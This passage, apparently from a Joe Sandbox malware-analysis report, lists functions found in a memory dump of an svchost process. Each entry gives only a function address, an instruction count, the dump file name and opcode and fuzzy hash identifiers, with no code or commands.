                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                  • Instruction ID: 8b5f628d5636348085379f4fde6ed7611b9c8f9cdf63ff8f3b6a8ee6ecd98554
                                                                                                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                  • Instruction Fuzzy Hash: 5F01F5321007449FDB22F766D804EABB7E9FFC4654F09881AA947CF580DA70E641CB60
                                                                                                                  Function 03C29353 Relevance: .0, Instructions: 48COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                  • Instruction ID: a28fdab158e405c6565c57162b515294e6987d87f292ccb979abd5496bf2c078
                                                                                                                  • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                  • Instruction Fuzzy Hash: 15118B32900B219FD721DF15C880F22BBE4BF807A2F1A886CD889CE5A5C774E890CB10
                                                                                                                  Function 03C533A5 Relevance: .0, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                  • Instruction ID: 211736eb9695ae7a565d87fbad533b74fd5c3055de464ee96c4dc2b486b28910
                                                                                                                  • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                  • Instruction Fuzzy Hash: 3501D63A700245ABCB16DA9BCC40F5FBEAC9F84681B150429BD05DF160EB34D982D768
                                                                                                                  Function 03C6D1D0 Relevance: .0, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                  • Instruction ID: 18979a55f3ac28f5b435221b6174320d1be38269cae53e495613a8f2daca89c8
                                                                                                                  • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                  • Instruction Fuzzy Hash: 0C01477AB086049BD710DA55E848F65B3A9EFC4A24F154155FE13CF280CB34EE00C790
                                                                                                                  Function 03C2826B Relevance: .0, Instructions: 46COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e010975258c13b822550de45133327b32b04503b59971c82d59a0b23a08fa049
                                                                                                                  • Instruction ID: 81d2ca28b61b82a9017a17080db5d615e6d953b6020668bbb3484d4ebea12ae9
                                                                                                                  • Opcode Fuzzy Hash: e010975258c13b822550de45133327b32b04503b59971c82d59a0b23a08fa049
                                                                                                                  • Instruction Fuzzy Hash: E301A776B00718DBC714EB66D8109AEBBB9EF40610F1E40699902EB640EE70EE01D691
                                                                                                                  Function 03C4E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                  • Instruction ID: 58cfeb3b82e2ad4587cbb24423230213fbf801dc41b43e2eed1168b641a49506
                                                                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                  • Instruction Fuzzy Hash: 6C015672200A809FD322E72DC948F36B7ECEB85754F0E04A1E815CFAA2D738DE40C625
                                                                                                                  Function 03CEF367 Relevance: .0, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2ae29f5ea68f03f2aca7532da503ee51a7cc5194c4ae3851d938435c6f9e4ca8
                                                                                                                  • Instruction ID: f143174fd43d5f9de163c31ce2d665ec64db0a1d04ba312bf8a14f223c2952b4
                                                                                                                  • Opcode Fuzzy Hash: 2ae29f5ea68f03f2aca7532da503ee51a7cc5194c4ae3851d938435c6f9e4ca8
                                                                                                                  • Instruction Fuzzy Hash: C3018475A10358EBDB14EBA5D815FAEBBB8EF44700F05406AF900EF380D6B4D900C795
                                                                                                                  Function 03C5BBA0 Relevance: .0, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a24f52cdb8288cb79fc50fb6bee831d4ad8badaeb1e95628220fc13d97c47883
                                                                                                                  • Instruction ID: 8c4eb2490f59abac4f0d8c860b9c67f4e7a9ab519ac111a68078e5964c945c8f
                                                                                                                  • Opcode Fuzzy Hash: a24f52cdb8288cb79fc50fb6bee831d4ad8badaeb1e95628220fc13d97c47883
                                                                                                                  • Instruction Fuzzy Hash: 2D017177900129DBCB28CF49C590BADBBA5EF44710F1900B9EC06EB340DB71AE40DB98
                                                                                                                  Function 03CF972B Relevance: .0, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                  • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                                                  • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                                                  • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                                                  Function 03D05636 Relevance: .0, Instructions: 44COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 66dac3e2e2e4d1f0187bb88953667efaeb0c694839f17cdc05bde3cee3794d56
                                                                                                                  • Instruction ID: 8a1495d8d9d4f57ddaa5a3836f358f316c86dcca380aaae98ed6ee6f97e92d49
                                                                                                                  • Opcode Fuzzy Hash: 66dac3e2e2e4d1f0187bb88953667efaeb0c694839f17cdc05bde3cee3794d56
                                                                                                                  • Instruction Fuzzy Hash: C7118078D10249EFCB04DFA9D444A9EB7B4FF18704F14805AB814EB380D774DA02CB95
                                                                                                                  Function 03C2C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                  • Instruction ID: ab5b5d546514d78179847919d1c7de3a7f08a707c974f547f1120e4177486e74
                                                                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                  • Instruction Fuzzy Hash: 55F0FC372447329BC732D6598880FBFBE958FC5AE4F1A8435E109DF204CAA48C0166D0
                                                                                                                  Function 03D05152 Relevance: .0, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e42647fbc2903431ac5fc9562641d1b7d6cb67f74037af0cc444dacae4bd6e71
                                                                                                                  • Instruction ID: 9509ad6e08b1cb302e539cd7e964c7de4bce2119415bcdae78b5fdebd469852c
                                                                                                                  • Opcode Fuzzy Hash: e42647fbc2903431ac5fc9562641d1b7d6cb67f74037af0cc444dacae4bd6e71
                                                                                                                  • Instruction Fuzzy Hash: 40012175A10249ABDB04DF69D941ADEBBB8FF49700F14405AE900E7380D674DA018BA5
                                                                                                                  Function 03D050D9 Relevance: .0, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 02dbca4db7effb4c93269f8c40031e3efd53de2d78438c8b042b6b588446f022
                                                                                                                  • Instruction ID: 99aa39236a86f66b4e91fe6b5b406a480cded04fcbc65302d24893fe472929b5
                                                                                                                  • Opcode Fuzzy Hash: 02dbca4db7effb4c93269f8c40031e3efd53de2d78438c8b042b6b588446f022
                                                                                                                  • Instruction Fuzzy Hash: F4012175A10349ABDB04DF69E945ADEB7B8FF49700F50405AE900F7380D674D9018BA5
                                                                                                                  Function 03D05060 Relevance: .0, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 380fd8eed4971adc9473b9ee9dd09704223ef240ce99881cc60853f8acb226bf
                                                                                                                  • Instruction ID: ce3225f657b6c9ea5f743dccbd6b56786e6c4971797550520b601669804131b7
                                                                                                                  • Opcode Fuzzy Hash: 380fd8eed4971adc9473b9ee9dd09704223ef240ce99881cc60853f8acb226bf
                                                                                                                  • Instruction Fuzzy Hash: B9012C75A10349ABDB04DFA9D941AEEBBB9FF49700F10405AF901EB381D674EA018BA5
                                                                                                                  Function 03C5C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                  • Instruction ID: d313dc013c0730c13839ad5c0576671c2b78b74b30814ecb3f20dd6e12f249e3
                                                                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                  • Instruction Fuzzy Hash: 0DF0C2B3A00610ABD324CF4DDC40E57F7EADBD4A80F098128A905CB220EA31DD04CB90
                                                                                                                  Function 03C65734 Relevance: .0, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                  • Instruction ID: ee200f05d0ac3732bebb1c45d4ed8ca7a26047699fd6f6167705117408750c21
                                                                                                                  • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                                                  • Instruction Fuzzy Hash: 27F0FF72A11214AFE319CF5CC880F6AF7EDEB46650F194079D500DF230E671DE04CA94
                                                                                                                  Function 03CEF78A Relevance: .0, Instructions: 42COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 52f232ad0e7aea1cddb06a4f45cde02051b5c1860a84953984b34101ae632e27
                                                                                                                  • Instruction ID: c4039667aba58132707657c66d2a809317195772e57f7e57fa16e48224328b47
                                                                                                                  • Opcode Fuzzy Hash: 52f232ad0e7aea1cddb06a4f45cde02051b5c1860a84953984b34101ae632e27
                                                                                                                  • Instruction Fuzzy Hash: F9010CB5E00749AFCB04DFA9D545AAEBBF4FF48304F11806AE855EB341E674DA00DB91
                                                                                                                  Function 03CEF2F8 Relevance: .0, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6f0a17e865466dfca079ec170e0af6579c41dee8bb7b78da35b067e17e13e831
                                                                                                                  • Instruction ID: 3564f3bdf926857e77654aebe9e807902d42407a753ad3b89f9e7a53d5330844
                                                                                                                  • Opcode Fuzzy Hash: 6f0a17e865466dfca079ec170e0af6579c41dee8bb7b78da35b067e17e13e831
                                                                                                                  • Instruction Fuzzy Hash: 90F06876F10348ABDB14DFB9D805AEEB7B8EF44710F01805AE551EB290DA74DA019791
                                                                                                                  Function 03D061E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 32c6e7bb9cdd26ca1f63edc4a7b0434f363218b78fc1ca57966d3c4a80cab349
                                                                                                                  • Instruction ID: d20a33663720d1899999862cf9c77b3bd5703e706a97b84c5466b5ee3888c61a
                                                                                                                  • Opcode Fuzzy Hash: 32c6e7bb9cdd26ca1f63edc4a7b0434f363218b78fc1ca57966d3c4a80cab349
                                                                                                                  • Instruction Fuzzy Hash: 32018F71A00258DBCB04DFA9D845AEEBBF8FF48710F14005AE900EB380D774EA01CB95
                                                                                                                  Function 03C6724D Relevance: .0, Instructions: 40COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                  • Instruction ID: 76ec125fc5d8741fa727e076ca71cc5ce99205ccb6eb4bdf0fd5a3d796dda9c4
                                                                                                                  • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                  • Instruction Fuzzy Hash: 19F09675A11355EBEF14D7AA8980FAFF7A8DF84614F098995BD02DF144DA30FA40C750
                                                                                                                  Function 03D053FC Relevance: .0, Instructions: 39COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4070539b45f2717402b3023c05403c2f87b50ef0fbaa2709fc0efa38ebb026f1
                                                                                                                  • Instruction ID: 41bff678cdc840568f096a8fc115a4260d9f0915d3082d71f33bce6fad78f5fd
                                                                                                                  • Opcode Fuzzy Hash: 4070539b45f2717402b3023c05403c2f87b50ef0fbaa2709fc0efa38ebb026f1
                                                                                                                  • Instruction Fuzzy Hash: 9E011A74E00249DFDB04DFA9D545B9EF7F4FF08700F14826AA919EB381EA74DA409B91
                                                                                                                  Function 03C2C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9b3a6d9c3d5c75bc077576970c6219c012e9ede7d3ffe6639efe9082a92e1d67
                                                                                                                  • Instruction ID: 10265be51b24358084e350df41fcd1d23b15f28d516339f405fe2205f2168a86
                                                                                                                  • Opcode Fuzzy Hash: 9b3a6d9c3d5c75bc077576970c6219c012e9ede7d3ffe6639efe9082a92e1d67
                                                                                                                  • Instruction Fuzzy Hash: CAF024B12043645BE715E659DC02B663A9AEBC0691F29C06AEB05CF2C0EA72ED018394
                                                                                                                  Function 03D03749 Relevance: .0, Instructions: 38COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                                  • Instruction ID: 2bf996a49921f59dffdb83d649b5123512b22de7b96cd5e21e86941ae823221b
                                                                                                                  • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                                                  • Instruction Fuzzy Hash: C3F04FBA940304BFE711EBA4CD41FDA77BCEB44710F100166BA56DA1D0EA70EE44DB94
                                                                                                                  Function 03CD437C Relevance: .0, Instructions: 37COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                  • Instruction ID: 7f7e34b023ffe957f92d17a240371a5d1c9bba870f73867d0663f4660b44c3c6
                                                                                                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                  • Instruction Fuzzy Hash: 3FF08939781B1247D77DEA6F9450B2EE2559F80A50B4E052CB755CFE40DF70DD019790
                                                                                                                  Function 03CEF3E6 Relevance: .0, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e71f9e3882bf2489dd2d190bd5623927570bdc043e764ca1e02bb36d7499d2b9
                                                                                                                  • Instruction ID: 7bb7f88231ea0c698ed9947c8040f0871027b44499e344f72297382d5ff6040c
                                                                                                                  • Opcode Fuzzy Hash: e71f9e3882bf2489dd2d190bd5623927570bdc043e764ca1e02bb36d7499d2b9
                                                                                                                  • Instruction Fuzzy Hash: BBF03775A01248EFCB04EFA9D545A9EBBF4EF48300F41806AF945EB381E674EA01DB55
                                                                                                                  Function 03C292FF Relevance: .0, Instructions: 35COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ec8e277f02e0223f1a736a43a1bfc908c28a2f43687de11755cf8b962589e4f6
                                                                                                                  • Instruction ID: 2e535e86e640714cae0b00c5c508827b6a0855224c42756e374de0d2cd0592ee
                                                                                                                  • Opcode Fuzzy Hash: ec8e277f02e0223f1a736a43a1bfc908c28a2f43687de11755cf8b962589e4f6
                                                                                                                  • Instruction Fuzzy Hash: D9F0FA32200340ABC731EB09CC04F9ABBEDEF84B00F090129A942C7190C7B0AA08C660
                                                                                                                  Function 03C347FB Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8e3ed25cce3a2bfda0612dbc7c089ca6128d1d009c14704db575f41160f9019d
                                                                                                                  • Instruction ID: 82c0c06972175104a612fa73df2a256189eccf1ccb111a06379035209f02ba8f
                                                                                                                  • Opcode Fuzzy Hash: 8e3ed25cce3a2bfda0612dbc7c089ca6128d1d009c14704db575f41160f9019d
                                                                                                                  • Instruction Fuzzy Hash: FAF0B43B9127D09FD736CB5BC444B21B7D9DB02764F0D89AAD889CF541C724DA81CA52
                                                                                                                  Function 03CEF6C7 Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c03e82ba3f75d433e4eccd0efd73df8e2b851d11c1f21e4339c60b0e06b15b10
                                                                                                                  • Instruction ID: d3ec34f0c0f002a71075cccda420fceaf5ebe104d0f7b70480902f54c0abdeb3
                                                                                                                  • Opcode Fuzzy Hash: c03e82ba3f75d433e4eccd0efd73df8e2b851d11c1f21e4339c60b0e06b15b10
                                                                                                                  • Instruction Fuzzy Hash: 1EF06D79A10388EBDB04EFA9D805EAEBBF4EF48304F014069E901EB381E674DA00DB54
                                                                                                                  Function 03CF0115 Relevance: .0, Instructions: 32COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 628f4e59559a59d0ea87436b5ae6e88029c9800bd386d66f48bf7349f6db4c6f
                                                                                                                  • Instruction ID: 849fd5fffcf5e33dd4ba1289e7d97ca17ecdd8f02cb5d4ca63eeda070dbb4d73
                                                                                                                  • Opcode Fuzzy Hash: 628f4e59559a59d0ea87436b5ae6e88029c9800bd386d66f48bf7349f6db4c6f
                                                                                                                  • Instruction Fuzzy Hash: 12F027BB41A7E04ECF71FB286850391BF689762810F1E5089C6A1DF306C9B5C683C620
